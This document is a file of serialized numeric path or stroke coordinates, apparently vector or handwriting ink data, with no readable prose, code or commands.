0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1 0,0-1-1,1 1 1,-1-1 0,0 0 0,0 1-1,1-1 1,-1 1 0,0-1 0,0 0-1,1 1 1,-1-1 0,1 0 0,-1 1-1,0-1 1,1 0 0,-1 1 0,1-1-1,-1 0 1,1 2 73,0 0 1,0 0-1,-1 0 0,1 1 0,-1-1 0,1 0 1,-1 0-1,0 0 0,0 1 0,0-1 0,0 0 1,-1 3-1,-3 15-2311,0-14-2338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10 200,'21'-9'14005,"-20"17"-9262,-1-7-4580,1-1-171,-1 0 1,1 0-1,-1 1 0,1-1 1,-1 0-1,1 1 0,-1-1 1,1 0-1,-1 1 1,1-1-1,-1 0 0,1 1 1,-1-1-1,0 1 0,1-1 1,-1 1-1,0-1 0,1 1 1,-1-1-1,0 1 0,0 0 1,0-1-1,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 1,0 0-1,0-1 0,0 1 1,1 14-3621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14 640,'-7'-13'9977,"14"32"-5314,3 18-2543,-10-10-1444,-1-17-517,0 0-1,1-1 1,1 1 0,0 0-1,0-1 1,0 1-1,6 16 1,-5-22-120,-1 1 1,0-1-1,0 1 0,-1-1 1,1 1-1,-1-1 0,0 8 1,0-7-17,-1-1 1,2 0-1,-1 1 1,0-1 0,1 1-1,0-1 1,2 7-1,8 26 75,-9-20-37,-3-16-101,1-1-1,0 1 0,0-1 0,-1 1 1,1-1-1,0 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0 0-1,0-1 0,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 1,1-1-1,-1 1 0,0-1 0,0 1 1,1-1-1,-1 0 0,1 1 1,-1-1-1,0 1 0,1-1 0,-1 0 1,1 1-1,-1-1 0,1 0 0,-1 0 1,1 1-1,-1-1 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-11-33-11501,10 17 8094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74 532,'7'-12'7158,"9"-13"-4077,-10 21-2673,-1 0-1,1 0 1,0 1 0,0-1 0,0 1-1,0 1 1,1-1 0,-1 1 0,1 0 0,0 0-1,-1 1 1,1 0 0,7 0 0,-5 1-534,0 1 1,0 1 0,0-1 0,0 1 0,0 1 0,-1-1-1,1 1 1,-1 1 0,0 0 0,0 0 0,0 1 0,0 0 0,9 7-1,-15-3-1386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26 888,'0'0'6156,"41"-18"-387,-35 16-5639,0 1 0,0-1 1,0 1-1,0 1 0,0-1 0,0 1 0,10 0 0,-10 0-79,82 7-470,-34-2-5526,-45 0 2608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54 1604,'-7'13'4309,"8"-13"-4225,-1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 1 0,1-1 1,-1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 0 1,0 0-1,0 0 0,2 0 1386,41 0 2433,-27 0-3706,1-1-1,0-1 0,0 0 0,-1-1 1,1-1-1,28-11 0,0-5-3206,0-4-5194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2 964,'-9'-1'12594,"7"2"-12562,0 3 102,1-1 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,0-1 0,0 1 0,1-1 0,-2 0 0,1 0 0,-4 3 0,-19 15 183,-7 11-177,26-25-160,0 0-1,1 0 1,0 0 0,0 1 0,-6 9 0,8-11-171,-1 0 0,1 0-1,-1-1 1,0 1 0,-1-1-1,1 0 1,-1-1 0,1 1-1,-1-1 1,-8 3 0,8-4-698,0 1 0,1-1 0,-1 0 0,0-1 0,0 0 0,-11 1 0,16-2 704,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1-1 0,1 1-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-2 0,0-8-1509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21 1392,'-1'-1'193,"1"0"0,0 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 1,1 1-1,-1-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,0 0 1,1-1-1,-1 1 0,1-1 0,-1 1 0,1 0 0,0-1 0,1 0-84,-2 1 119,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 1,1 0-1,-1 1 0,1 0 0,16 18 2139,10 25-1071,5 10-774,-30-51-508,0 0-1,-1 0 1,1 0 0,0 0-1,0-1 1,0 1 0,1 0-1,3 3 1,16 20 63,-21-23-75,1 0 0,1-1-1,-1 1 1,0-1 0,1 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0-1,6 2 1,20 16-324,-27-19 104,0 0 1,0 1-1,0-1 0,-1 0 0,1 0 0,1 0 0,-1 0 1,0-1-1,0 1 0,0-1 0,0 1 0,0-1 0,1 0 1,-1 0-1,4 0 0,22-6-9136,-19 1 6387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0 161 1724,'1'-1'385,"-1"-1"1,0 1-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,1-1 0,0 1 1,44-15 2062,-4 1-1947,-24 5-463,-13 7-28,0 0 1,0 0-1,0-1 1,-1 0-1,1 0 1,-1 0-1,6-5 1,-9 6 28,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 1,-1 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,-3-3 0,1 1 605,2 3-605,1 0 0,-1 1 1,1-1-1,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,-1 1 0,-3 2 18,-1-1 0,0 1 0,1 0 0,0 1 0,0 0 0,0-1 0,0 1 0,1 1 1,-1-1-1,1 1 0,-4 5 0,-26 25 384,32-33-413,-1 0 0,1 0 1,-1 0-1,1 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 1-1,1 0 0,-1-1 1,1 1-1,-1 0 0,1 0 1,0 0-1,1 1 0,-1-1 1,0 0-1,1 0 0,-1 0 0,1 0 1,0 1-1,0-1 0,1 0 1,-1 0-1,1 0 0,-1 0 1,1 1-1,0-1 0,0 0 1,3 5-1,-1-3-34,0-1 0,0 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,1-1 1,-1 0-1,1 1 0,-1-1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-2 0,0 1 0,10 2 0,22 4-155,-24-5-286,1 0 0,-1-1 0,18 1 0,-9-2-1766,-20 0 1551,1-1 0,0 0 0,0 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0-1 0,0 0-1,-1 1 1,1-1 0,0 0 0,-1 0 0,4-2-1,5-3-2341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17 88,'-3'-11'7931,"-3"10"-7361,-2-1 1915,7 1-2394,1 1-1,-1 0 0,1 0 0,-1-1 1,0 1-1,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 1 0,0-1 0,1 0 1,-1 0-1,1 1 0,-1-1 1,0 1-1,-14 3 773,12-4-789,1 1 1,0-1-1,0 0 1,0 1 0,0 0-1,0-1 1,0 1-1,1 0 1,-1 0-1,0 0 1,-2 2-1,-25 20 598,14-12-449,0 1-1,1 0 1,1 1 0,0 1 0,0 0 0,1 0 0,1 2-1,-14 24 1,24-38-214,1 0 0,-1 0 0,1 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,1 1 0,-1-1 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,1 0-1,0 1 1,1 1-6,-1 0 1,1-1-1,0 1 0,0-1 0,1 1 0,-1-1 0,1-1 1,4 5-1,-2-5-71,0 1 0,1-1 1,-1 0-1,0 0 0,1-1 1,0 1-1,-1-2 0,1 1 1,0-1-1,-1 0 0,1 0 1,0-1-1,-1 1 0,8-3 1,42-13-3823,-1-5-4437,-34 10 5209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8 332,'-1'-6'14111,"3"4"-13601,6 8-1696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2 300,'0'-1'7594,"0"4"-7014,14 41 1404,-5-22-1328,-4-5-209,0 1-1,-2 0 0,0-1 0,1 27 0,7 48 903,0-26-853,-11 42-204,0-107-311,-2-13-7239,-5 5 4566,5-4-205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0 155 16,'0'-4'528,"1"1"1,-1-1-1,1 1 1,-1-1-1,1 1 1,0 0-1,1-1 0,-1 1 1,0 0-1,1 0 1,0 0-1,0 0 0,4-5 1,-1 2-10,0 0 0,1 1 1,-1 0-1,1 0 0,1 1 0,6-4 0,9-4 470,1 1-1,43-13 0,-62 22-856,7-1-41,0-1 0,0 2-1,0-1 1,0 2 0,1-1-1,-1 2 1,0-1 0,1 2-1,-1-1 1,1 2 0,-1-1-1,0 1 1,0 1 0,0 0-1,0 1 1,0 0 0,-1 1-1,0 0 1,19 12 0,-28-15-56,1 0-1,0 0 1,-1 0 0,1 0-1,-1 1 1,0-1 0,0 1 0,0-1-1,0 1 1,0-1 0,0 1 0,-1 0-1,1-1 1,-1 1 0,0 0-1,0-1 1,0 1 0,0 0 0,0-1-1,0 1 1,-1 0 0,0-1-1,-1 5 1,-6 12 296,-7 6-58,3-14-215,1 0 1,-2-1-1,1 0 1,-1-1 0,-1-1-1,0 0 1,-15 7 0,-13 7-98,23-11-73,-18 7-228,2-4-201,22-2-1552,7 5-4617,23-17 2411,-14 1 3463,10 4-1839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22 135 372,'11'-23'10617,"-2"11"-10523,-8 10 988,-5-14 1359,6 14-2072,-1 2-505,-10 18 858,7-16-719,1-2-3,1 0 0,0 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1-1,1 0 1,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0-1,0 1 1,0-1 0,-1 0 0,1 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,0 0 0,0 1 0,0-1 0,0 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1-1,0-1 1,0 1 0,0-1 0,0 0 0,0 1 0,1 0-1,-3 4 23,-1 0-13,1-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 1,1 1-1,-2 8 0,3-4-33,2 33-10,-1-42 33,-1 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,1-1 0,-1 1 1,0-1-1,0 0 0,1 1 0,-1-1 0,3 1 0,9 11-17,-12-11 17,-1-1-1,1 1 1,0-1-1,1 0 1,-1 0-1,0 0 1,0 1-1,0-1 1,1 0-1,-1 0 1,1-1-1,-1 1 1,0 0-1,4 1 1,15 6 2,-14-5 1,0 0 1,0-1-1,0 0 1,0 0 0,1 0-1,-1-1 1,0 0-1,1 0 1,-1 0 0,1-1-1,12-1 1,-13 1-2,0-1 0,1 0 0,-1-1-1,0 1 1,0-1 0,0 0 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1-1 0,-1 1 0,0-1 0,0 0 0,-1 0 0,1-1-1,6-8 1,-6 6-4,0 0 0,0-1-1,-1 0 1,0 0-1,0-1 1,3-9-1,1-4-3,-6 17 8,0 1 0,0 0 0,-1-1 0,0 1 1,0-1-1,0 1 0,1-10 0,-2 8 1,0 1 4,0-1-1,0 1 0,0 0 1,-1-1-1,1 1 0,-1 0 1,-1 0-1,1 0 0,-3-8 1,0 0 11,4 13-16,0-1 0,0 1-1,0-1 1,-1 0-1,1 1 1,0-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-1-1 1,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,-1 0-1,1-1 1,0 1 0,-1-1-1,1 1 1,0 0-1,-1 0 1,1-1 0,-1 1-1,1 0 1,-1 0 0,0-1-1,-17-10 106,16 8-82,-1 1 0,1 0 0,-1 1 1,0-1-1,1 0 0,-1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 1,1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,-2 0 0,0 0-36,-1 1-1,1 0 1,0 0 0,0 0-1,0 1 1,0 0 0,1 0-1,-1 1 1,1-1 0,0 1-1,0 0 1,0 1 0,1-1-1,-1 1 1,1 0 0,0 0-1,0 0 1,1 1 0,0-1-1,-6 13 1,-9 24-1671,-3-1-3785,19-24 281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44 412,'0'0'581,"10"18"2334,-9-16-2804,-1-1 1,1 1 0,-1 0-1,1 0 1,0 0 0,-1-1-1,1 1 1,0 0-1,0-1 1,0 1 0,1-1-1,-1 1 1,0-1 0,0 1-1,1-1 1,-1 0 0,3 2-1,-2-3 867,-2 0-938,1 0 1,-1 0-1,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 1,1 0-1,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1-1 1,-1 1-1,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 0 0,11-40 1096,10 9-850,-21 32-278,0 0 0,0 0 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 1,1 0-1,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 2 123,-6-4 484,15 33 345,2 30-786,0 5 289,14 32 445,-23-92-952,16 39 326,-17-43-341,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 1,0 1-1,0-1 0,1 1 0,-1-1 0,0 0 1,0 0-1,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,0 0 0,-1-1 0,3 1 0,-2 4-1843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28,'0'0'1227,"11"18"2886,-9-12-3822,0-1 0,1 1 0,0-1 1,0 1-1,0-1 0,4 5 0,0 1 64,6 11 213,-8-11-413,1-1 0,0 0-1,0 0 1,1 0 0,1-1-1,-1 0 1,2 0 0,-1-1 0,14 11-1,-20-19-211,-1 1 0,1-1 1,-1 0-1,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1-1 1,-1 1-1,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 0 1,0 0-1,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,1-2 0,21-26-2791,-2-15-308,-12 27 1987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8 204,'0'-1'-110,"18"-6"4636,-11 8-898,-12 8-1336,-1 0-1702,1 0-1,0 0 1,0 1-1,1 0 1,1 0-1,0 0 1,-3 10-1,-9 31 463,-21 68 220,18-51-764,-24 119 722,40-154-1108,2-31-134,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 0,-1-1 0,1 1 1,0-1-1,-1 0 0,0 1 0,0-1 0,1 0 1,-1 1-1,-1-1 0,0 3 0,1-7-576,0 1-1,1 0 1,-1 0 0,1-1-1,-1 1 1,1-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1 0,1 1-1,-1 0 1,1-1-1,-1 1 1,2-2 0,7-14-2963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0 756,'0'0'793,"22"5"5775,-33 28-1917,10-28-4184,0 1-1,-1 0 1,0-1 0,0 1 0,0-1-1,-6 10 1,-8 20 160,-24 56 115,34-72-564,1 0 0,1 1 1,-4 37-1,19 11 205,-11-61-378,1 1-1,0-1 1,1 0-1,0 0 1,0 0-1,0 0 1,1 0-1,0-1 1,0 1-1,1-1 1,0 1-1,0-1 1,0 0-1,1-1 1,0 1-1,0-1 1,0 0-1,1 0 1,-1-1-1,1 0 1,0 0-1,1 0 1,-1 0-1,1-1 1,-1 0-1,8 2 1,-12-5-228,1 1 1,-1 0-1,0-1 0,0 1 1,0-1-1,0 0 1,1 1-1,-1-1 1,0 0-1,0-1 1,0 1-1,5-1 0,1-8-3742,-5-11-3326,-3 9 4187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54 644,'4'27'4892,"-4"-24"-4729,1 0 0,0 0-1,0-1 1,0 1 0,0 0 0,1-1-1,-1 1 1,1 0 0,-1-1-1,1 0 1,3 4 0,14 16 422,-17-19-560,0 0 1,0 0-1,1 0 1,-1 0 0,1-1-1,-1 1 1,1-1-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0-1,1 0 1,4 1-1,-1-2 30,0 0-1,0 0 1,0 0-1,0-1 0,0 0 1,1 0-1,-1-1 1,0 0-1,0 0 0,0-1 1,0 0-1,0 0 1,0 0-1,-1-1 0,1 0 1,-1 0-1,0-1 0,10-7 1,-12 7 18,1-1 0,-1 0 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0-1 1,-1 0-1,1 0 0,-1 0 0,0 0 0,2-12 0,-4 16 42,0-1-1,-1 0 1,1 1-1,-1-1 1,1 1 0,-1-1-1,0 1 1,0-1-1,0 1 1,0-1 0,-1 1-1,1 0 1,0-1-1,-1 1 1,0 0-1,1 0 1,-1 0 0,0 0-1,0 1 1,0-1-1,0 0 1,-1 1 0,1 0-1,0-1 1,-1 1-1,1 0 1,-1 0 0,1 0-1,-1 1 1,1-1-1,-1 0 1,0 1 0,1 0-1,-1 0 1,0 0-1,1 0 1,-4 0 0,-4 0 20,1 0 0,0 1 0,-1 0 0,1 1 0,0 0 0,0 0 0,0 1 1,0 0-1,-9 5 0,14-6-168,-1 1 0,1-1 0,-1 1-1,1 0 1,0 1 0,0-1 0,0 0 0,1 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1-1,-1-1 1,-3 9 0,1 25-6199,16-37 1859,-1-1 1841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47 608,'10'-12'3090,"-9"11"-2979,0 1 1,-1-1-1,1 1 0,0-1 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 1 0,1-1 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-1 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,1-1 0,3-4 281,2-6 7425,-6 13-7742,0-1-1,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,0 0 1,0 0-1,0 0 1,-1 1-1,1-1 0,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 1-1,0-1 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,-1-1 1,1 1-1,0 0 1,-1 0-1,0 0 1,-12 17 388,12-17-387,-14 3-5,14-3-53,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,-1 0-1,1 0 1,0 0 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1-1,0 0 1,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0-14,-1 0 1,0 0 0,0 0-1,0-1 1,1 1 0,-1 0-1,0 0 1,0 0 0,0 1-1,1-1 1,-1 0-1,0 0 1,0 0 0,0 1-1,1-1 1,-1 0 0,0 1-1,0-1 1,1 0 0,-1 1-1,0-1 1,1 1 0,-1-1-1,1 1 1,-1 0-1,0 0 1,-22 10 32,23-9-27,0-1 0,-1 0-1,1 1 1,-1-1 0,1 0-1,-1 0 1,1 0 0,-1 0-1,0 1 1,0-1 0,1 0-1,-1 0 1,0 0 0,-2 1-1,-7 64-11,10-64 2,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,0 0 0,0 0 1,-1-1-1,1 1 0,1 0 1,-1-1-1,0 1 0,0-1 0,3 3 1,0 1-16,-1-2 12,0 0-1,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0-1 0,-1 1 0,1-1 0,0 0 1,0 0-1,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,-1-1 1,1 1-1,0-1 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,6-6 0,-5 4-5,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,0 1 1,0-1-1,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,0-10 0,-1 12 7,0 1 1,-1-1-1,1 1 0,-1 0 1,0-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,0 1 0,0-1 1,0 0-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 0,-5-2 1,3 2-5,-1-1 0,1 0 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 1 0,0 0 0,0 0 0,1 0 0,-1 0-1,-8 2 1,5 1-154,0 1 0,0 0 0,0 0 0,1 0 0,0 1-1,-9 8 1,-23 20-3573,21-18-432,6-2-1887,3-7 2973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18 756,'0'-17'6617,"0"28"-5005,0-6-1264,-1 0 1,1 0-1,1 0 1,-1 0-1,1 0 1,0 0-1,0-1 1,0 1-1,0 0 0,3 5 1,1 10 1000,1-2-313,-5-17-926,0 1-1,1 0 0,-1 0 0,-1 0 0,1 0 0,0 1 1,0-1-1,-1 0 0,1 0 0,-1 0 0,0 3 0,5 16 300,1-9-256,8 24 106,-13-34-260,-1 0-1,1 0 0,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0-1 1,0 1-1,1 0 1,-1 0-1,1 0 0,-1-1 1,4 3-1,-3 5-1941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19 756,'-2'-19'9461,"-23"27"-3604,20-5-5562,0 1 1,0 0-1,1 0 1,-1 0-1,1 0 1,-5 6 0,5-5-269,1-1 1,-1 1 0,1 0 0,0 0-1,1 0 1,-1 0 0,1 0-1,0 0 1,0 1 0,1-1 0,-1 1-1,0 7 1,-9 35 356,11-44-383,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1-1,0 1 1,1 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,5 2-1,0 1 21,1-2-1,-1 1 1,1-1-1,0 0 0,0 0 1,1-1-1,9 2 0,-14-4-33,-1 0 0,1-1 0,0 1-1,0-1 1,-1 0 0,1 0 0,0 0-1,-1-1 1,1 1 0,0-1 0,-1 0 0,1 0-1,0 0 1,-1-1 0,0 1 0,1-1-1,-1 0 1,0 0 0,0 0 0,0 0-1,0 0 1,4-5 0,3-3-235,-1-1-1,0 0 1,-1 0 0,10-19 0,-17 28 218,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,0 0 1,-1-2-1,-22-38-58,17 31 82,5 8 17,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,1 1 0,-7-4 0,-20 2 259,26 3-265,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,-4 2 0,-38 16-2412,3-2-4956,39-16 6939,0-2-715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0 620,'0'0'1518,"2"11"624,-1-9-1870,1 0 1,-1 0-1,0 0 1,0 0 0,0 1-1,0-1 1,0 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 1-1,0-1 1,0 0-1,0 1 1,0-1 0,0 0-1,-2 5 1,2 8 1888,11 16 1158,-12 6-1277,0-19-1696,1 0 0,1 0 0,0 0 1,8 36-1,2 12-94,-3-38-206,5 10-16,-5-23-39,-8-14-60,0 0-1,1 0 1,-1 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,2 1 0,-1-1-1338,-23-12-13487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8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575 55 1128,'-8'-4'13193,"3"3"-12574,-21 0 1474,25 1-2041,0 0 0,-1 0 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,0 0 0,0 1 1,0-1-1,1 0 0,-1 0 0,0 0 0,-1-1 1,-28-6 626,26 6-552,4 2-110,-1 0 0,1 0 1,-1 0-1,1-1 0,-1 1 0,1 0 1,-1-1-1,1 1 0,-1 0 0,1-1 1,0 1-1,-1 0 0,1-1 0,0 1 1,-1-1-1,1 1 0,0-1 0,-1 1 1,1-1-1,0 1 0,0-1 0,0 1 1,-1-1-1,1 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0-2 0,-45 0 782,41 0-762,0 0 1,-1 1 0,1-1-1,-1 1 1,0 0 0,1 0-1,-1 1 1,0-1 0,-4 1-1,7 0 13,0 0-9,-1 0 0,0-1 0,1 2 0,-1-1-1,0 0 1,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1-1,-4 3 1,-44-3 493,-17 23-435,64-22-96,0 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,1 0 0,-1 0 0,-5 5 0,-12 9 11,19-16-13,1 0 1,-1 0-1,0 0 1,1 0-1,-1 1 0,0-1 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 1-1,1-1 1,-1 1-1,0-1 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1 0 0,-1-1 1,1 1-1,0 0 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,-1 0 1,1 0-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 0,1 0 1,-1 0-1,0 0 0,0-1-1,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-2 0 81,-22 23 202,21-21-274,2-2-8,1 0-1,0 0 1,-1 0-1,1 0 0,0 1 1,0-1-1,-1 0 1,1 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 0,0-1 1,0 0-1,0 1 1,-1-1-1,1 0 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 1,0 0-1,1 1 1,-11 8-3,9-9 2,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,-10 19 25,15-4-4,-7-13-35,-7 2 7,9-3 2,-1 0 0,1 0 0,0 0-1,-1 1 1,1-1 0,0 0 0,1 1 0,-1-1-1,0 0 1,1 1 0,-1-1 0,1 5 0,-13 18 